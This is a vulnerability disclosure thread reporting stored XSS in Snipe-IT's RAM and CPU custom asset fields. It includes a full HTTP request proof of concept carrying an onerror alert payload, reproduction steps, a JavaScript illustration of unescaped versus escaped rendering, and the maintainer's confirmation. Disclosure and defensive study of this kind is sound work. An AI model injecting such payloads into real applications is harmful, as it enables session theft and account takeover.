Cross-site Scripting (XSS) - Stored in snipe/snipe-it
Reported on
Nov 11th 2021
Description
Multiple stored XSS vulnerabilities in the '_snipeit_ram_3' and '_snipeit_cpu_4' fields of the multipart body of the POST request sent when creating a new Asset or editing an existing Asset.
Proof of Concept
POST /hardware HTTP/1.1
Host: develop.snipeitapp.com
Connection: close
Content-Length: 2560
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://develop.snipeitapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary46mG0KnErxSyjdPS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://develop.snipeitapp.com/hardware/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv5demo_session=0Eh7YSRhHibblEqPBiMIwljUeqCKslZfeRVyUL7Y; assetsListingTable.bs.table.pageNumber=1; assetsListingTable.bs.table.searchText=abcde; laravel_token=[value redacted]%3D; XSRF-TOKEN=eyJpdiI6Ik9jZkdjcmFWazlOd2s0N3ZXRlZsYkE9PSIsInZhbHVlIjoiMWY1MnBuNG9XUnVZQlg4aTZGYXUzVEJ3a1k2ajlLVXBoRkZKKzZacXE0K2xod1JEbkdQSmN1UzVMSnduQ2d2UGRiTm01dUlJK1BhOUxrMGNmVzRBS2hDY2JIK1JVR1ZTRGw5WFZFMDR3VExmaVg1WDY3MjRSbnl2UWRaNkF0WHIiLCJtYWMiOiI0OTM0NGY2MGFjYTU5ODEzYjYxZTNiYjdkNTBjM2RhZDdjNmMxZTAxYmY4MjdmNDFkNjAyYjc4NDU1MmFmNTc2IiwidGFnIjoiIn0%3D
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_token"
KqyxmJgNorRhODZo5Inzo4FAzqdOvLscrtYuzbQd
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="company_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="asset_tags[1]"
PGS-IT-sdf35777
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="serials[1]"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="model_id"
8
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_ram_3"
"><img src=x onerror=alert(1);>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_cpu_4"
"><img src=x onerror=alert(1);>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_mac_address_5"
00:00:5e:00:53:af
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="status_id"
1
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="checkout_to_type"
user
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_user"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_asset"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_location"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="name"
abcde
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_date"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="supplier_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="order_number"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_cost"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="warranty_months"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="notes"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="rtd_location_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary46mG0KnErxSyjdPS--
Steps to Reproduce
- After logging in, on the dashboard click Create New -> Asset in the top right corner to create a new asset
- Fill in the required information in all fields on the Create Asset page
- In the Model field, select a model for which the RAM and CPU fields appear
- In the RAM and CPU fields, enter the payload
"><img src=x onerror=alert(1);>
- Click the Save button
- In the left menu bar, click List All in the Assets section to go to the All Assets page
- Search for the name of the asset you created above; an XSS popup will display
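As an added illustration (not Snipe-IT's own code): the JavaScript below, using a constructed asset record, shows why a stored custom-field value such as _snipeit_ram_3 turns into live markup when it is concatenated into the asset-list HTML unescaped, and how escaping at the output sink renders the same value as inert text. The field names and payload are taken from the report; the rendering helpers and the foreign-tag check are hypothetical.

```javascript
// Added example, not Snipe-IT code. The asset record is constructed; the
// custom-field values reuse the payload and MAC address from the report.
const asset = {
  name: "abcde",
  asset_tag: "PGS-IT-sdf35777",
  custom_fields: {
    _snipeit_ram_3: '"><img src=x onerror=alert(1);>',
    _snipeit_cpu_4: '"><img src=x onerror=alert(1);>',
    _snipeit_mac_address_5: "00:00:5e:00:53:af",
  },
};

// Escape the characters an HTML parser treats as markup so the value is
// displayed as text, whether it lands in element content or an attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable pattern: the raw stored value is dropped straight into the
// attribute and the cell body, so '">' closes the attribute and the <img>
// with its onerror handler is parsed as real markup.
function renderCellUnsafe(value) {
  return `<td title="${value}">${value}</td>`;
}

// Hardened pattern: escape every untrusted value at the output sink.
function renderCellSafe(value) {
  const v = escapeHtml(value);
  return `<td title="${v}">${v}</td>`;
}

// Render one asset row (name, tag, then each custom field) with a renderer.
function renderRow(a, renderCell) {
  const cells = [a.name, a.asset_tag, ...Object.values(a.custom_fields)];
  return `<tr>${cells.map(renderCell).join("")}</tr>`;
}

// Regression check for a view helper: report any element other than the
// <tr>/<td> tags the row renderer deliberately emits.
function containsForeignTag(html) {
  return /<(?!\/?(td|tr)\b)[a-z]/i.test(html);
}

console.log(containsForeignTag(renderRow(asset, renderCellUnsafe))); // true
console.log(containsForeignTag(renderRow(asset, renderCellSafe)));   // false
```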
Impact
This vulnerability could be used to steal a user's session cookie and, with the stolen cookie, gain unauthorized access to that user's account.
PoC Video: PoC
Can you reproduce this on demo.snipeitapp.com, or only on develop? Develop is not intended for production use.
Hi @maintainer, on demo.snipeitapp.com, when creating a new Asset, after choosing a model, no RAM or CPU fields appear, so it cannot be reproduced on the demo. Likewise, on the List All Assets page there are no CPU and RAM columns.
So, the XSS vulnerability only exists on develop, which has the vulnerable fields (CPU and RAM).
I guess those fields may be new features that you are experimenting with in the develop demo. So, if you intend to implement them in the production release, you can keep an eye out for the potential XSS vulnerability I mentioned in this report.
Hi @maintainer, can you mark this disclosure as a valid one? At least it is still vulnerable on the dev branch. The next time I check for bugs, I will take care of the demo for the master branch.
You can create those features on the demo instance by going into Custom Fields and then associating them with a model, then creating an asset of that model type.
I don't really consider this bounty-worthy, since it's likely fixed on master already and would be resolved when master gets merged down into develop. (i.e. this looks like a duplicate to me of a bug that was fixed on master in the past few weeks.)
I have followed your instructions to create a new custom field, and then I created a new asset with the XSS payload in that custom field; the XSS popup showed up.
(Note that this time I reproduced it on demo.snipeitapp.com, which is your master branch; you can check my new PoC here: PoC)
I also know that you were notified of another XSS report a few weeks ago. However, the XSS vulnerability in that report exists in other functions. Furthermore, it requires user interaction to trigger the XSS. In contrast, the XSS popup in my report will be triggered whenever a user views the asset list, with no further action required.
Thanks for the clarification - I can confirm this is reproducible on master
Hi @snipe, @admin, Can you credit my name (Chau Minh Khanh) in the vulnerability information on Snyk? (https://security.snyk.io/vuln/SNYK-PHP-SNIPESNIPEIT-1923007). Thanks a lot!
@khanhchauminh - as mentioned in a separate report, this page will be included in the CVE, which includes the credit 👌 👍
A bug in our system caused the fix bounty to be set to $11.88 post validation. I have reverted it to the correct value of $10.